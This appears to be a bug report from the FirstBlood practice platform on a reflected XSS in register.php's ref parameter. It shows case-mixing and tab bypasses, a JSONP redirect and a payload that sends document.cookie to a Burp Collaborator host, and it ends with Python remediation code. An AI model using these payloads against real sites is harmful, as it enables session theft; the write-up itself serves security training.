FirstBlood #703: Reflective XSS on register page
This issue was discovered on FirstBlood v2

On 2021-10-27, axe Level 4 reported:

Steps

  1. After the test is finished and reset, continue to test XSS in ref parameter

  2. Insert <svg/onload=alert(0)> -> F12 -> the angle brackets are found to be HTML-encoded

  3. Insert the XSS payload after URL encoding: <script>alert(0)</script> -> it is found that "script" is filtered

  4. After testing, it is found that case is not strictly filtered. Finally, the XSS payload JaVascrIPt:alert(0) is used -> bypass successful!

Vulnerability Exploitation

XSS -> JSONP escalation

/register.php?ref=JaVascrIPt:window.location.href=`https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)`

Open Redirect -> XSS -> Stealing Token

  1. Open Redirect(Resolved #537)

  2. XSS(Resolved)

  3. I can't solve it for now: I can't get the drps cookie value because I'm not logged in with the admin credentials.

ref=jaVaScRipt:window.location.href=`http://orj0lpqahknr61w80s3opl4i59b0zp.burpcollaborator.net/${document.cookie}

  4. Successfully obtained the administrator's cookie!!! https://orj0lpqahknr61w80s3opl4i59b0zp.burpcollaborator.net/doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9;%20drps=5a1884f0368eae4bb80dcbebd

Suggestions for fixing

  1. blacklist all JavaScript cases

Study reference materials

  1. https://blog.detectify.com/2019/05/16/the-real-impact-of-an-open-redirect/

  2. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#bypass-case-sensitive

  3. https://www.bugbountyhunter.com/vulnerability/?type=xss

P3 Medium

Endpoint: /register.php

Parameter: ref

Payload: jaVaScRipt:alert`1`


FirstBlood ID: 32
Vulnerability Type: Reflective XSS

The ?ref parameter on register.php was poorly fixed and can be bypassed in several ways. Firstly, the developer failed to use strtolower() when comparing strings, so a mixed-case `javascript:` scheme passes the check; secondly, characters such as %09 (tab) will also bypass the filter.
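As an added illustration (not FirstBlood's own code, and written in Python rather than the site's PHP), here is the kind of case-sensitive blacklist the description above implies, beside an allow-list check that decodes the value, strips the ASCII control characters browsers ignore inside a scheme (the %09 bypass), and lowercases the scheme (the strtolower() step) before deciding whether to accept the target. The allowed host name is a constructed placeholder.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Browsers drop ASCII control characters (tab, newline, ...) inside a URL,
# so "java%09script:" is still treated as the javascript: scheme once rendered.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)


def weak_ref_filter(ref: str) -> bool:
    """Assumed shape of the flawed fix: a case-sensitive blacklist applied to
    the raw value, with no decoding or lowercasing. True means 'accepted'."""
    return "javascript:" not in ref and "<script>" not in ref


def safe_ref_target(ref: str, allowed_hosts=("app.example.test",)) -> Optional[str]:
    """Allow-list check: returns the cleaned redirect target, or None to reject.
    Only a site-relative path or an http(s) URL on an allowed host passes."""
    cleaned = _CONTROL_CHARS.sub("", unquote(ref))
    m = _SCHEME.match(cleaned)
    if m is None:
        # No scheme at all: accept a relative path, but not //host or /\host
        if cleaned.startswith("/") and not cleaned.startswith(("//", "/\\")):
            return cleaned
        return None
    scheme = m.group(1).lower()          # the missing strtolower() step
    if scheme not in ("http", "https"):
        return None                      # javascript:, data:, etc. rejected
    rest = cleaned[m.end():]
    if not rest.startswith("//"):
        return None
    # Authority = up to the first '/', '?' or '#'; drop userinfo and port
    authority = re.split(r"[/?#]", rest[2:], maxsplit=1)[0]
    host = authority.rsplit("@", 1)[-1].split(":", 1)[0].lower()
    return cleaned if host in allowed_hosts else None
```

The weak filter accepts both payload forms from this report, while the allow-list check rejects them and only lets relative paths or known-host http(s) URLs through.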